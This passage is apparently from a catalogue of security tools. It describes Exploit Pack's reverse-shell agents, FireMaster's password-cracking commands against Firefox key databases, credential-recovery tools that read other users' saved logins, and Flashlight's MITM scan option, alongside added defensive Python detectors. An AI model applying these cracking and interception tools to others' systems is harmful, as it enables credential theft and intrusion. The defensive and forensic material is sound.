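            continue
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append({"type": "arp_rebind", "time": ts, "ip": ip,
                           "old_mac": previous, "new_mac": mac})
        ip_to_mac[ip] = mac
    owned = defaultdict(set)
    for ip, mac in ip_to_mac.items():
        owned[mac].add(ip)
    for mac, ips in owned.items():
        if gateway_ip in ips and len(ips) > 1:
            alerts.append({"type": "gateway_shared_mac", "mac": mac,
                           "ips": sorted(ips)})
    return alerts


def detect_ra_flood(events, window_s=2.0, max_routers=3):
    """Report the first moment at which more than max_routers distinct
    (MAC, prefix) advertisements were seen within window_s seconds, or
    None when the RA rate stays within the threshold."""
    seen = []   # (time, (mac, prefix)) for every RA, in arrival order
    for ts, kind, mac, prefix in events:
        if kind != "ra":
            continue
        seen.append((ts, (mac, prefix)))
        recent = {router for t, router in seen if ts - window_s <= t}
        if len(recent) > max_routers:
            return {"type": "ra_flood", "time": ts, "routers": len(recent),
                    "sources": sorted({m for m, _ in recent})}
    return None


if __name__ == "__main__":
    for alert in detect_arp_spoofing(EVENTS):
        print(alert)
    print(detect_ra_flood(EVENTS))
```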

Download Evil FOCA
EXPLOIT PACK - OPEN SOURCE SECURITY PROJECT
FOR PENETRATION TESTING AND EXPLOIT
DEVELOPMENT

Exploit Pack is an open source GPLv3 security tool; this
means it is fully free and you can use it without any kind of
restriction. Other security tools like Metasploit, Immunity
Canvas, or Core Impact are ready to use as well but you will
require an expensive license to get access to all the features,
for example: automatic exploit launching, full report capabilities,
reverse shell agent customization, etc. Exploit Pack is fully free,
open source and GPLv3. Because this is an open source
project you can always modify it, add or replace features and
get involved in the next project decisions; everyone is more
than welcome to participate. We developed this tool thinking for
and as pentesters. As security professionals we use Exploit
Pack on a daily basis to deploy real environment attacks into
real corporate clients.
Video demonstration of the latest Exploit Pack release:


More than 300+ exploits

Military grade professional security tool
Exploit Pack comes into the scene when you need to execute a
pentest in a real environment, it will provide you with all the
tools needed to gain access and persist by the use of remote
reverse agents.
Remote Persistent Agents

Reverse a shell and escalate privileges

Exploit Pack will provide you with a complete set of features to
create your own custom agents, you can include exploits or
deploy your own personalized shellcodes directly into the
agent.
Write your own Exploits

Use Exploit Pack as a learning platform


Quick exploit development, extend your capabilities and code
your own custom exploits using the Exploit Wizard and the
built-in Python Editor modded to fulfill the needs of an Exploit
Writer.

Download Exploit Pack


FARADAY 1.0.15 - COLLABORATIVE PENETRATION TEST
AND VULNERABILITY MANAGEMENT PLATFORM

A brand new version is ready for you to enjoy! Faraday v1.0.15
(Community, Pro & Corp) was published today with new
exciting features.
As a part of our constant commitment to the IT sec community
we added a tool that runs several other tools to all IPs in a
given list. This results in a major scan to your infrastructure
which can be done as frequently as necessary. Interested?
Read more about it here.
This version also features three new plugins and a fix
developed entirely by our community! Congratulations
to Andres and Ezequiel for being the first two winners of
the Faraday Challenge! Are you interested in winning tickets for
Ekoparty as well? Submit your pull request or find us on
freenode #faraday-dev and let us know.
Changes:

* Continuous Scanning Tool cscan added to ./scripts/cscan
* Hosts and Services views now have pagination and search
* Updates version number on Faraday Start
* Added Services columns to Status Report
* Converted references to links in Status Report. Support for
CVE, CWE, Exploit Database and Open Source Vulnerability
Database
* Added Pippingtom, SSHdefaultscan and pasteAnalyzer
plugins
Fixes:

* Debian install
* Saving objects without parent
* Visual fixes on Firefox

Download Faraday 1.0.15
FARADAY 1.0.16 - COLLABORATIVE PENETRATION TEST
AND VULNERABILITY MANAGEMENT PLATFORM

Faraday introduces a new concept - IPE (Integrated
Penetration-Test Environment) a multiuser Penetration test
IDE. Designed for distribution, indexation and analysis of the
generated data during the process of a security audit.
This version comes with major changes to our Web UI,
including the possibility to mark vulnerabilities as false
positives. If you have a Pro or Corp license you can now create
an Executive Report using only confirmed vulnerabilities,
saving you even more time.
A brand new feature that comes with v1.0.16 is the ability to
group vulnerabilities by any field in our Status Report view.
Combine it with bulk edit to manage your findings faster than
ever!
This release also features several new features developed
entirely by our community.

Changes:

* Added group vulnerabilities by any field in our Status Report
* Added port to Service type target in new vuln modal
* Filter false-positives in Dashboard, Status Report and
Executive Report (Pro&Corp)
* Added Wiki information about running Faraday without
configuring CouchDB https://github.com/infobyte/faraday/wiki/APIs
* Added parametrization for port configuration on APIs
* Added scripts to:
- get all IPs from targets that have no services (/bin/getAllIpsNotServices.py)
- get all IP addresses that have defined open port (/bin/getAllbySrv.py) and get all IPs from targets without services (/bin/delAllVulnsWith.py)
It's important to note that both these scripts hold a
variable that you can modify to alter its behaviour. /bin/getAllbySrv.py has a port variable set to 8080 by default. /bin/delAllVulnsWith.py does the same with a RegExp
* Added three Plugins:
- Immunity Canvas
- Dig
- Traceroute
* Refactor Plugin Base to update active WS name in var
* Refactor Plugins to use current WS in temp filename under
$HOME/.faraday/data. Affected Plugins:
- amap
- dnsmap
- nmap
- sslcheck
- wcscan
- webfuzzer
- nikto
Bug fixes:
* When the last workspace was null Faraday wouldn't start
* CSV export/import in QT
* Fixed bug that prevented the use of "reports" and "cwe"
strings in Workspace names
* Unicode support in Nexpose-full Plugin
* Fixed bug get_installed_distributions from handler exceptions
* Fixed bug in first run of Faraday with log path and API errors

Download Faraday 1.0.16
FARADAY V1.0.7 - INTEGRATED PENETRATION-TEST
ENVIRONMENT A MULTIUSER PENETRATION TEST IDE

Faraday introduces a new concept: IPE (Integrated Penetration-Test Environment), a multiuser penetration test IDE. It is designed for the distribution, indexation and analysis of the data generated during a security audit.
The main purpose of Faraday is to re-use the tools available in the community and take advantage of them in a multiuser way. Designed for simplicity, users should notice no difference between their own terminal application and the one included in Faraday. It is developed with a specialized set of functionalities that help users improve their own work. Do you remember programming without an IDE? Faraday does for a penetration test what an IDE does for you when programming.

Changes made to the UX/UI:


Improved Vulnerability Edition usability: selecting a vulnerability will load its content automatically.
ZSH UI now shows notifications.
ZSH UI displays active workspaces.
Faraday now asks for confirmation when exiting. If you have pending conflicts to resolve it will show the number for each one.
Vulnerability creation is now supported in the status report.
Introducing SSLCheck, a tool for verifying bugs in SSL/TLS certificates on remote hosts. This is integrated with Faraday as a plugin.
Shodan Plugin is now working with the new API.
Some cosmetic changes for the status report.
Bugfixes:
Sorting columns in the Status Report is running smoothly.
The Workspace icon is now based on the type of workspace being used.
Opening the reports in QT UI opens the active workspace.
Web UI date fixes: we were showing dates with an off-by-one error.
Vulnerability edition was missing the 'critical' severity.
Objects merge bugfixing
Metadata recursive save fix

Download Faraday
FASTNETMON - VERY FAST DDOS ANALYZER WITH
SFLOW/NETFLOW/MIRROR SUPPORT

A high performance DoS/DDoS load analyzer built on top of multiple packet capture engines (NetFlow, IPFIX, sFLOW, netmap, PF_RING, PCAP).
What can we do? We can detect hosts in our own network with a large amount of packets per second, bytes per second or flows per second, incoming to or outgoing from certain hosts. And we can call an external script which can notify you, switch off a server or blackhole the client.


Features:

Can process incoming and outgoing traffic
Can trigger a block script if a certain IP loads the network with a large amount of packets/bytes/flows per second
Can announce blocked IPs to a BGP router with ExaBGP
Integration with Graphite
netmap support (open source; wire speed processing; only Intel hardware NICs or any hypervisor VM type)
Supports L2TP decapsulation, VLAN untagging and MPLS processing in mirror mode
Can work on a server/soft-router
Can detect DoS/DDoS in 1-2 seconds
Tested up to 10GE with 5-6 Mpps on Intel i7 2600 with Intel NIC 82599
Complete plugin support
Complete support for the most popular attack types

Supported platforms:

Linux (Debian 6/7/8, CentOS 6/7, Ubuntu 12+)
FreeBSD 9, 10, 11
Mac OS X Yosemite
What is a "flow" in FastNetMon terms? It is one or multiple UDP, TCP or ICMP connections with a unique src IP, dst IP, src port, dst port and protocol.
Example of CPU load on Intel i7 2600 with Intel X540/82599 NIC at 400 kpps load:

To enable sFLOW simply specify the IP of the server with FastNetMon installed and port 6343. To enable NetFlow simply specify the IP of the server with FastNetMon installed and port 2055.
Why did we write this? Because we couldn't find any software solving this problem in the open source world!
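A per-host detector along the lines the text describes (count packets, bytes and distinct flows per second for each host in our own network, then hand a host that crosses a limit to an external action), written as an added example for this page; it is not FastNetMon's code, and the thresholds, the 10.0.0.0/24 "our network" range and the traffic sample are constructed.

```python
import ipaddress
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class Packet:
    ts: float      # capture time in seconds (e.g. from a mirror port or an sFlow sample)
    src: str
    dst: str
    sport: int
    dport: int
    proto: str     # "tcp", "udp" or "icmp"
    length: int    # bytes on the wire


# A "flow" in FastNetMon terms: the unique (src IP, dst IP, src port, dst port, protocol) tuple.
FlowKey = Tuple[str, str, int, int, str]


@dataclass
class Thresholds:
    """Constructed limits; FastNetMon reads its own from its configuration."""
    pps: int = 20_000       # packets per second
    mbps: float = 1_000.0   # megabits per second
    flows: int = 3_500      # distinct flows per second


@dataclass
class Counters:
    packets: int = 0
    octets: int = 0
    flows: Set[FlowKey] = field(default_factory=set)


Bucket = Tuple[str, str, int]   # (host, "incoming" | "outgoing", whole second)


def count_per_second(packets: List[Packet], our_networks: List[str]) -> Dict[Bucket, Counters]:
    """Bucket traffic per host, direction and second for hosts inside our networks.
    A packet is 'outgoing' for its source host and 'incoming' for its destination host;
    hosts outside our networks (remote peers or spoofed sources) are not tracked."""
    nets = [ipaddress.ip_network(n) for n in our_networks]

    def ours(ip: str) -> bool:
        addr = ipaddress.ip_address(ip)
        return any(addr in n for n in nets)

    buckets: Dict[Bucket, Counters] = defaultdict(Counters)
    for p in packets:
        sec = int(p.ts)
        for host, direction in ((p.src, "outgoing"), (p.dst, "incoming")):
            if ours(host):
                c = buckets[(host, direction, sec)]
                c.packets += 1
                c.octets += p.length
                c.flows.add((p.src, p.dst, p.sport, p.dport, p.proto))
    return buckets


Hit = Tuple[str, str, str, float]   # (host, direction, metric, observed rate)


def detect(packets: List[Packet], our_networks: List[str], th: Thresholds,
           on_ban: Optional[Callable[[str, str, str, float], None]] = None) -> List[Hit]:
    """Return every (host, direction, metric, rate) that crosses a threshold in some
    second, ordered by (host, direction, second). on_ban is called once per host, on its
    first violation, the way FastNetMon hands a banned host to an external script."""
    hits: List[Hit] = []
    banned: Set[str] = set()
    buckets = count_per_second(packets, our_networks)
    for (host, direction, _sec), c in sorted(buckets.items(), key=lambda kv: kv[0]):
        mbps = c.octets * 8 / 1_000_000
        checks = (("pps", float(c.packets), th.pps),
                  ("mbps", mbps, th.mbps),
                  ("flows", float(len(c.flows)), th.flows))
        for metric, value, limit in checks:
            if value > limit:
                hits.append((host, direction, metric, value))
                if on_ban is not None and host not in banned:
                    banned.add(host)
                    on_ban(host, direction, metric, value)
    return hits


def sample_capture() -> List[Packet]:
    """Constructed traffic: one host in 10.0.0.0/24 receiving 5000 UDP packets from
    250 spoofed sources inside a single second, plus one normal TLS exchange."""
    flood = [Packet(100.0 + i * 0.0001, "203.0.113.%d" % (i % 250 + 1), "10.0.0.5",
                    40000 + i, 53, "udp", 1400) for i in range(5000)]
    normal = [Packet(100.5, "10.0.0.9", "198.51.100.7", 51000, 443, "tcp", 500),
              Packet(101.2, "198.51.100.7", "10.0.0.9", 443, 51000, "tcp", 1200)]
    return flood + normal


if __name__ == "__main__":
    limits = Thresholds(pps=3000, mbps=10.0, flows=1000)   # lowered to fit the small sample
    for host, direction, metric, rate in detect(
            sample_capture(), ["10.0.0.0/24"], limits,
            on_ban=lambda h, d, m, r: print("BAN", h, d, m, round(r))):
        print(host, direction, metric, round(rate, 1))
```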

Download FastNetMon
FING - FIND OUT WHICH DEVICES ARE CONNECTED TO
YOUR WI-FI NETWORK

Find out which devices are connected to your Wi-Fi network, in just a few seconds.
Fast and accurate, Fing is a professional App for network
analysis. A simple and intuitive interface helps you evaluate
security levels, detect intruders and resolve network issues.
Discovers all devices connected to a Wi-Fi network.
Unlimited devices and unlimited networks, for free!
Displays MAC Address and device manufacturer.
Enter your own names, icons, notes and location
Full search by IP, MAC, Name, Vendor and Notes
History of all discovered networks.
Share via Twitter, Facebook, Message and E-mail
Service Scan: Find hundreds of open ports in a few seconds.
Wake On LAN: Switch on your devices from your mobile or tablet!
Ping and traceroute: Understand your network performance.
Automatic DNS lookup and reverse lookup
Checks the availability of Internet connection
Works also with hosts outside your local network
Tracks when a device has gone online or offline
Launch Apps for specific ports, such as Browser, SSH,
FTP
Displays NetBIOS names and properties
Displays Bonjour info and properties
Supports identification by IP address for bridged networks
Sort by IP, MAC, Name, Vendor, State, Last Change.
Free of charge, no banner Ads
Available for iPhone, iPad and iPod Touch with retina and
standard displays.
Integrates with Fingbox to sync and backup your
customizations, merge networks with multiple access
points, monitor remote networks via Fingbox Sentinels,
get notifications of changes, and much more.
Fing is available on several other platforms, including
Windows, OS X and Linux. Check them out!

Download Fing
FIREFOX AUTOCOMPLETE SPY - TOOL TO VIEW OR
DELETE AUTOFILL DATA FROM MOZILLA FIREFOX

Firefox Autocomplete Spy is a free tool to easily view and delete all your autocomplete data from the Firefox browser.
Firefox stores Autocomplete entries (typically form fields) such as login name, email, address, phone, credit/debit card number, search history etc. in an internal database file.
'Firefox Autocomplete Spy' helps you to automatically find and view all the Autocomplete history data from the Firefox profile location. For each entry, it displays the following details:

Field Name
Value
Total Used Count
First Used Date
Last Used Date

You can also use it to view a history file belonging to another user on the same or a remote system. It also provides a one-click solution to delete all the displayed Autocomplete data from the history file.
It is very simple to use for everyone, which makes it a handy tool for forensic investigators.
Firefox Autocomplete Spy is fully portable and works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.
Features

Instantly view all the autocomplete data from the Firefox form history file
On startup, it auto-detects the Autocomplete file from the default profile location
Sort feature to arrange the data in various orders, making it easier to search through hundreds of entries
Delete all the Autocomplete data with just a click of a button
Save the displayed autocomplete list to an HTML/XML/TEXT/CSV file
Easier and faster to use with its enhanced user-friendly GUI interface
Fully portable, does not require any third-party components like JAVA, .NET etc.
Support for local installation and uninstallation of the software

How to Use

Firefox Autocomplete Spy is easy to use with its simple GUI interface.
Here are the brief usage details:
Launch FirefoxAutocompleteSpy on your system.
By default it will automatically find and display the autocomplete file from the default profile location. You can also select the desired file manually.
Next click on the 'Show All' button and all stored Autocomplete data will be displayed in the list, as shown in screenshot 1 below.
If you want to remove all the entries, click on the 'Delete All' button below.
Finally you can save all displayed entries to an HTML/XML/TEXT/CSV file by clicking on the 'Export' button and then selecting the type of file from the drop-down box of the 'Save File Dialog'.

Download Firefox Autocomplete Spy


FIREMASTER - THE FIREFOX MASTER PASSWORD
CRACKING TOOL

FireMaster is the first ever tool to recover the lost Master Password of Firefox.
The master password is used by Firefox to protect the stored login/password information for all visited websites. If the master password is forgotten, then there is no way to recover the master password and the user will lose all the passwords stored in it.
However you can now use FireMaster to recover the forgotten master password and get back all the stored logins/passwords.
FireMaster supports Dictionary, Hybrid, Brute-force and advanced Pattern based Brute-force password cracking techniques to recover passwords from simple to complex. The advanced pattern based password recovery mechanism reduces cracking time significantly, especially when the password is complex.
FireMaster is successfully tested with all versions of Firefox starting from 1.0 to the latest version v13.0.1.
It works on a wide range of platforms starting from Windows XP to Windows 8.
Firefox Password Manager and Master Password

Firefox comes with a built-in password manager tool which remembers usernames and passwords for all the websites you visit. This login/password information is stored in encrypted form in Firefox database files residing in the user's profile directory.
However anybody can just launch the password manager from the Firefox browser and view the credentials. Also one can just copy these database files to a different machine and view them offline using tools such as FirePassword.
Hence, to protect from such threats, Firefox uses a master password to provide enhanced security. By default Firefox does not set a master password. However once you have set the master password, you need to provide it every time to view login credentials. So if you lose the master password then that means you have lost all the stored passwords as well.
So far there was no way to recover these credentials once you had lost the master password. Now FireMaster can help you to recover the master password and get back all the signon information.
Internals of FireMaster

Once you have lost the master password, there is no way to recover it as it is not stored at all.
Whenever the user enters the master password, Firefox uses it to decrypt the encrypted data associated with a known string. If the decrypted data matches this known string then the entered password is correct. FireMaster uses a similar technique to check for the master password, but in a more optimized way.
The entire operation goes like this:

FireMaster generates passwords on the fly through various methods.
Then it computes the hash of the password using a known algorithm.
Next this password hash is used to decrypt the encrypted data for the known plain text (i.e. "password-check").
Now if the decrypted string matches the known plain text (i.e. "password-check") then the generated password is the master password.

Firefox stores the details about the encrypted string, salt, algorithm and version information in the key database file key3.db in the user's profile directory. You can just copy this key3.db file to a different directory and specify the corresponding path to FireMaster. You can also copy this key3.db to any other high-end machine for a faster recovery operation.
FireMaster supports the following password recovery methods:

1) Dictionary Cracking Method
In this mode, FireMaster uses a dictionary file with each word on a separate line to perform the operation. You can find lots of online dictionaries of different sizes and pass them on to FireMaster. This method is quicker and can find common passwords.
2) Hybrid Cracking Method
This is an advanced dictionary method, in which each word in the dictionary file is prefixed or suffixed with a word generated from a known character list. This can find passwords like pass123, 12test, test34 etc. From the specified character list (such as 123), all combinations of strings are generated and appended or prefixed to the dictionary word based on user settings.
3) Brute-force Cracking Method
In this method, all possible combinations of words from the given character list are generated and then subjected to the cracking process. This may take a long time depending upon the number of characters and the position count specified.
4) Pattern based Brute-force Cracking Method
The pattern based cracking method significantly reduces the password recovery time, especially when the password is complex. This method can be used when you know the exact password length and remember a few characters.
How to use FireMaster?

First you need to copy the key3.db file to a temporary directory. Later you have to specify this directory path to FireMaster as the last argument.
Here is the general usage information:
Firemaster [-q] [-d -f ] [-h -f -n -g "charlist" [ -s | -p ] ] [-b -m -l -c "charlist" -p "pattern" ]

Note: With v5.0 onwards, you can specify 'auto' (without quotes) in place of "" to automatically detect the default profile path.
Dictionary Crack Options:
-d    Perform dictionary crack
-f    Dictionary file with words on each line

Hybrid Crack Options:
-h    Perform hybrid crack operation using dictionary passwords.
      Hybrid crack can find passwords like pass123, 123pass etc
-f    Dictionary file with words on each line
-g    Group of characters used for generating the strings
-n    Maximum length of strings to be generated using above character list.
      These strings are added to the dictionary word to form the password
-s    Suffix the generated characters to the dictionary word (pass123)
-p    Prefix the generated characters to the dictionary word (123pass)

Brute Force Crack Options:
-b    Perform brute force crack
-c    Character list used for brute force cracking process
-m    [Optional] Specify the minimum length of password
-l    Specify the maximum length of password
-p    [Optional] Specify the pattern for the password

Examples of FireMaster
// Dictionary Crack
FireMaster.exe -d -f c:\dictfile.txt auto
// Hybrid Crack
FireMaster.exe -h -f c:\dictfile.txt -n 3 -g "123" -s auto
// Brute-force Crack
FireMaster.exe -q -b -m 3 -l 10 -c "abcdetps123" "c:\my test\firefox"
// Brute-force Crack with Pattern
FireMaster.exe -q -b -m 3 -c "abyz126" -l 10 -p "pa??f??123" auto

Download FireMaster
FIREMASTERCRACKER - FIREFOX MASTER PASSWORD
CRACKING SOFTWARE

The Firefox browser uses a Master password to protect the stored login passwords for all visited websites. If the master password is forgotten, then there is no way to recover the Master Password and the user will also lose all the website login passwords.
In such cases, FireMasterCracker can help you to recover the lost Master Password. It uses the dictionary based password cracking method. You can find good collections of password dictionaries (also called wordlists).
Though it supports only the Dictionary Crack method, you can easily use tools like Crunch or Cupp to generate a brute-force based or any custom password list file and then use it with FireMasterCracker.
It is very easy to use with its cool & simple interface. It is designed to make it simpler and quicker for users who find it difficult to use the command-line based FireMaster.
FireMasterCracker works on a wide range of platforms starting from Windows XP to Windows 8.
Features

Here are the prime features of FireMasterCracker:
Free & easiest tool to recover the Firefox Master Password
Supports the Dictionary based Password Recovery method
Automatically detects the current Firefox profile location
Displays detailed statistics during the cracking operation
Stop the password cracking operation at any time
Easy to use with a cool graphical interface
Generate a Password Recovery report in HTML/XML/TEXT format
Includes an installer for local installation & uninstallation

Download FireMasterCracker
FIREPASSWORD - FIREFOX USERNAME & PASSWORD
RECOVERY TOOL

FirePassword is the first ever tool (back in early 2007) released to recover the stored website login passwords from the Firefox browser.
Like other browsers, Firefox also stores the login details, such as username and password, for every website visited by the user, with the user's consent. All these secret details are stored in the Firefox sign-on database securely in an encrypted format.
FirePassword can instantly decrypt and recover these secrets even if they are protected with a Master Password.
Also FirePassword can be used to recover sign-on passwords from a different profile (for other users on the same system) as well as from a different operating system (such as Linux, Mac etc.). This greatly helps forensic investigators, who can copy the Firefox profile data from the target system to a different machine and recover the passwords offline without affecting the target environment.
This mega release supports password recovery from the new password file 'logins.json' starting with Firefox version 32.x.
Note: FirePassword is not a hacking or cracking tool, as it can only help you to recover your own lost website passwords that were previously stored in the Firefox browser.
It works on a wide range of platforms starting from Windows XP to Windows 8.
Features

Instantly decrypt and recover stored encrypted passwords from the 'Firefox Sign-on Secret Store' for all versions of Firefox.
Recover passwords from the Mozilla based SeaMonkey browser as well.
Supports recovery of passwords from the local system as well as a remote system. The user can specify the Firefox profile location from the remote system to recover the passwords.
It can recover passwords from the Firefox secret store even when it is protected with a master password. In such a case the user has to enter the correct master password to successfully decrypt the sign-on passwords.
Automatically discovers the Firefox profile location based on the installed version of Firefox.
On a successful recovery operation, the username and password along with the corresponding login website are displayed.
Fully portable version, can be run from anywhere.
Integrated installer for assisting you in local installation & uninstallation.

Download FirePassword
FLASHLIGHT - AUTOMATED INFORMATION GATHERING
TOOL FOR PENETRATION TESTERS

Pentesters spend too much time during the information gathering phase. Flashlight (Fener) provides services to scan networks/ports and gather information rapidly on target networks. So Flashlight should be the choice to automate the discovery step during a penetration test. In this article, the usage of the Flashlight application will be explained.
For more information about using Flashlight, the "-h" or "-help" option can be used.
The parameters for the usage of this application are listed below:

-h, --help: It shows the information about using the Flashlight application.
-p <ProjectName> or --project <ProjectName>: It sets the project name with the name given. This parameter can be used to save different projects in different workspaces.
-s <ScanType> or --scan_type <ScanType>: It sets the type of scan. There are four types of scans: Active Scan, Passive Scan, Screenshot Scan and Filtering. These types of scans will be examined later in detail.
-d <DestinationNetwork>, --destination <DestinationNetwork>: It sets the network or IP that the scan will be executed against.
-c <FileName>, --config <FileName>: It specifies the configuration file. The scanning is realized according to the information in the configuration file.
-u <NetworkInterface>, --interface <NetworkInterface>: It sets the network interface used during passive scanning.
-f <PcapFile>, --pcap_file <PcapFile>: It sets the pcap file that will be filtered.
-r <RasterizeFile>, --rasterize <RasterizeFile>: It sets the specific location of the Rasterize JavaScript file which will be used for taking screenshots.
-t <ThreadNumber>, --thread <ThreadNumber>: It sets the number of threads. This parameter is valid only in screenshot scanning (screen scan) mode.
-o <OutputDirectory>, --output <OutputDirectory>: It sets the directory in which the scan results are saved. The scan results are saved in 3 sub-directories: for Nmap scanning results the "nmap" subdirectory, for PCAP files the "pcap" subdirectory and for screenshots the "screen" subdirectory. Scan results are saved in the directory shown under the output directory given by this parameter. If this option is not set, scan results are saved in the directory that the Flashlight application is running from.
-a, --alive: It performs a ping scan to discover up IP addresses before the actual vulnerability scan. It is used for active scan.
-g <DefaultGateway>, --gateway <DefaultGateway>: It identifies the IP address of the gateway. If not set, the interface with the -I parameter is chosen.
-l <LogFile>, --log <LogFile>: It specifies the log file to save the scan results. If not set, logs are saved in the flashlight.log file in the working directory.
-k <PassiveTimeout>, --passive_timeout <PassiveTimeout>: It specifies the timeout for sniffing in passive mode. The default value is 15 seconds. This parameter is used for passive scan.
-m, --mim: It is used to perform a MITM attack.
-n, --nmap-optimize: It is used to optimize the nmap scan.
-v, --verbose: It is used to list detailed information.
-V, --version: It shows the version of the program.

VIDEOS:

https://www.youtube.com/watch?v=EUMKffaAxzs&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=4
https://www.youtube.com/watch?v=qCgW-SfYl1c&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=5
https://www.youtube.com/watch?v=98Soe01swR8&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=6
https://www.youtube.com/watch?v=9wft9zuh1f0&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=7
INSTALLATION
apt-get install nmap tshark tcpdump dsniff

In order to install phantomjs easily, you can download and extract it from https://bitbucket.org/ariya/phantomjs/downloads.
The Flashlight application can perform 3 basic scan types and 1 analysis type. Each of them is listed below.

1) PASSIVE SCAN
In a passive scan, no packets are sent onto the wire. This type of scan is used for listening to the network and analyzing packets.
To launch a passive scan using Flashlight, a project name should be specified, like passive-pro-01. In the following command, packets captured on eth0 are saved into the "/root/Desktop/flashlight/output/passive-project-01/pcap" directory, whereas pcap files and all logs are saved into the "/root/Desktop/log" directory.
./flashlight.py -s passive -p passive-pro-01 -i eth0 -o /root/Desktop/flashlight_test -l /root/Desktop/log -v

2) ACTIVE SCAN
During an active scan, NMAP scripts are used by reading the configuration file. An example configuration file (flashlight.yaml) is stored in the config directory under the working directory.
tcp_ports:
- 21, 22, 23, 25, 80, 443, 445, 3128, 8080

udp_ports:
- 53, 161

scripts:
- http-enum

According to the "flashlight.yaml" configuration file, the scan executes against the "21, 22, 23, 25, 80, 443, 445, 3128, 8080" TCP ports and the "53, 161" UDP ports, and runs the "http-enum" script, using NMAP.
Note: During an active scan the screen_ports option is useless. This option only works with screen scan.
The -a option is useful to discover up hosts by sending ICMP packets. Besides this, incrementing the thread number using the -t parameter increases scan speed.
./flashlight.py -p active-project -s active -d 192.168.74.0/24 -t 30 -a -v

By running this command, output files in three different formats (Normal, XML and Grepable) are emitted for four different scan types (Operating system scan, Ping scan, Port scan and Script scan).
The example commands that the Flashlight application runs can be given like so:

Operating System Scan: /usr/bin/nmap -n -Pn -O -T5 -iL /tmp/"IPListFile" -oA /root/Desktop/flashlight/output/active-project/nmap/OsScan-"Date"
Ping Scan: /usr/bin/nmap -n -sn -T5 -iL /tmp/"IPListFile" -oA /root/Desktop/flashlight/output/active-project/nmap/PingScan-"Date"
Port Scan: /usr/bin/nmap -n -Pn -T5 --open -iL /tmp/"IPListFile" -sS -p T:21,22,23,25,80,443,445,3128,8080,U:53,161 -sU -oA /root/Desktop/flashlight/output/active-project/nmap/PortScan-"Date"
Script Scan: /usr/bin/nmap -n -Pn -T5 -iL /tmp/"IPListFile" -sS -p T:21,22,23,25,80,443,445,3128,8080,U:53,161 -sU --script=default,http-enum -oA /root/Desktop/flashlight/output/active-project/nmap/ScriptScan-"Date"

3) SCREEN SCAN
Screen Scan is used to get screenshots of web sites/applications by using directives in the config file (flashlight.yaml). The directive in this file provides screen scan for four ports ("80, 443, 8080, 8443"):
screen_ports:
- 80, 443, 8080, 8443

A sample screen scan can be performed like this:
./flashlight.py -p project -s screen -d 192.168.74.0/24 -r /usr/local/rasterize.js -t 10 -v

4) FILTERING
The Filtering option is used to analyse pcap files. An example for this option is shown below:
./flashlight.py -p filter-project -s filter -f /root/Desktop/flashlight/output/passive-project-02/pcap/20150815072543.pcap -v
By running this command some files are created in the filter sub-folder. This option analyzes PCAP packets according to the properties below:

Windows hosts
Top 10 DNS requests

...

Download Flashlight
FORPIX - SOFTWARE FOR DETECTING AFFINE IMAGE
FILES

forpix is a forensic program for identifying similar images that are no longer identical due to image manipulation. Hereinafter I will describe the technical background for a basic understanding of the need for such a program and how it works.
From image files, or files in general, you can create so-called cryptologic hash values, which represent a kind of fingerprint of the file. In practice, these values have the characteristic of being unique. Therefore, if the hash value for a given image is known, the image can be uniquely identified among a large amount of other images by its hash value. The advantage of this fully automated procedure is that the semantic perception of the image content by a human is not required. This methodology is an integral and fundamental component of an effective forensic investigation.
Due to the avalanche effect, which is a necessary feature of cryptologic hash functions, a minimal change of the image, one a human would not recognize, causes a drastic change of the hash value. Although the original image and the manipulated image are almost identical, this no longer applies to the hash values. Therefore the above-mentioned application for identification is ineffective in the case of similar images.
A method was applied that resolves the ineffectiveness of cryptologic hash values. It uses the fact that an offender is interested in preserving certain image content. To some degree, this preserves the contrast as well as the color and frequency distribution. The method provides three algorithms to generate robust hash values of the mentioned image features. In case of a manipulation of the image, the hash values change either not at all or only moderately, in proportion to the degree of manipulation. By comparing the hash values of a known image with those of a large quantity of other images, similar images can now be recognized fully automatically.
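To show the contrast the text draws between a cryptologic hash and a robust hash, here is an added example that is not forpix's code: its three algorithms are not reproduced, a simple 64-bit average hash of an 8x8 thumbnail stands in for the robust hash, and the 64x64 grayscale image and the barely visible manipulation are constructed.

```python
import hashlib
from typing import List, Tuple

Image = List[List[int]]   # grayscale, values 0..255, row-major


def make_test_image(w: int = 64, h: int = 64) -> Image:
    """Constructed input: a horizontal gradient with a bright square in the middle."""
    img = [[int(255 * x / (w - 1)) for x in range(w)] for _ in range(h)]
    for y in range(h // 4, 3 * h // 4):
        for x in range(w // 4, 3 * w // 4):
            img[y][x] = 230
    return img


def manipulate(img: Image, brightness: int = 12) -> Image:
    """A change a viewer would hardly notice: a small global brightness shift plus a
    single edited pixel. Either alone is enough to change every cryptologic digest."""
    out = [[min(255, v + brightness) for v in row] for row in img]
    out[0][0] = (out[0][0] + 1) % 256
    return out


def sha256_hex(img: Image) -> str:
    """The cryptologic fingerprint of the raw pixel bytes."""
    return hashlib.sha256(bytes(v for row in img for v in row)).hexdigest()


def downscale(img: Image, size: int = 8) -> Image:
    """Block-average to size x size; assumes both dimensions are multiples of size."""
    h, w = len(img), len(img[0])
    bh, bw = h // size, w // size
    small = []
    for by in range(size):
        row = []
        for bx in range(size):
            block = [img[y][x] for y in range(by * bh, (by + 1) * bh)
                     for x in range(bx * bw, (bx + 1) * bw)]
            row.append(sum(block) // len(block))
        small.append(row)
    return small


def average_hash(img: Image) -> int:
    """64-bit aHash: one bit per thumbnail cell, set when the cell is brighter than
    the thumbnail mean. A brightness shift moves every cell and the mean alike, so
    the bit pattern (the coarse contrast layout) survives; only content changes flip bits."""
    vals = [v for row in downscale(img) for v in row]
    mean = sum(vals) / len(vals)
    bits = 0
    for v in vals:
        bits = (bits << 1) | (1 if v > mean else 0)
    return bits


def hamming(a: int, b: int) -> int:
    """Number of differing bits; the distance between two robust hashes."""
    return bin(a ^ b).count("1")


def compare(original: Image, candidate: Image, max_distance: int = 10) -> Tuple[bool, int, int, bool]:
    """Return (sha256 identical, differing sha256 bits, aHash distance, judged similar)."""
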